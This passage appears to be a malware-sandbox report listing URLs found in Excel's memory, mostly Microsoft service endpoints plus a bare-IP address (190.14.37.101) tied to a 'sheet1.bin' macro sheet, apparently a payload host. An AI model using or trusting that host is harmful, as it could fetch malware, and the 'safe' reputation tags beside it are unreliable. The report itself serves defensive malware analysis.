                                                                          https://graph.windows.netEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                                                            		high
                                                                            https://api.addins.store.officeppe.com/addinstemplatebWEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://190.14.37.101/53321935-2125563209-4053062332-1002yEXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord?EXCEL.EXE, 00000000.00000002.981507571.0000000012880000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://management.azure.comhEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://login.microsoftonline.com/zEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonEXCEL.EXE, EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                                                                  		high
                                                                                  https://login.windows.net/common/oauth2/authorizeize)EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://substrate.office.comcEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://ncus.contentsync.EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://190.14.37.101/AEXCEL.EXE, 00000000.00000003.829061292.0000000015322000.00000004.00000001.sdmp, sheet1.binfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingMBI_SSL_SHORTssl.EXCEL.EXE, 00000000.00000002.980136152.000000000D3AC000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/EXCEL.EXE, EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                                                                        		high
                                                                                        http://weather.service.msn.com/data.aspxEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                                                                          		high
                                                                                          https://substrate.office.comPEXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                                                                            		high
                                                                                            https://outlook.office365.com/autodiscover/autodiscover.jsonsPEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://onedrive.live.com/embed?ZEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                                                                                  		high
                                                                                                  https://outlook.office.comR87EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://login.windows.net/common/oauth2/authorizebEXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://wus2.contentsync.EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://login.windows.net/common/oauth2/authorizedEXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://clients.config.office.net/user/v1.0/ios630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                                                                                        		high
                                                                                                        https://sr.outlook.office.net/ws/speech/recognize/assistant/workOEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://login.windows.net/common/oauth2/authorizegEXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            https://login.windows.net/common/oauth2/authorizeXEXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://analysis.windows.net/powerbi/api8EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://o365auditrealtimeingestion.manage.office.com630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                                                                                                  		high
                                                                                                                  https://outlook.office365.com/api/v1.0/me/ActivitiesEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                                                                                                    		high
                                                                                                                    https://api.addins.omex.office.net/appstate/queryEXEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://login.windows.net/common/oauth2/authorizePEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://login.windows.net/common/oauth2/authorizeQEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://clients.config.office.net/user/v1.0/android/policies630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                                                                                                            		high
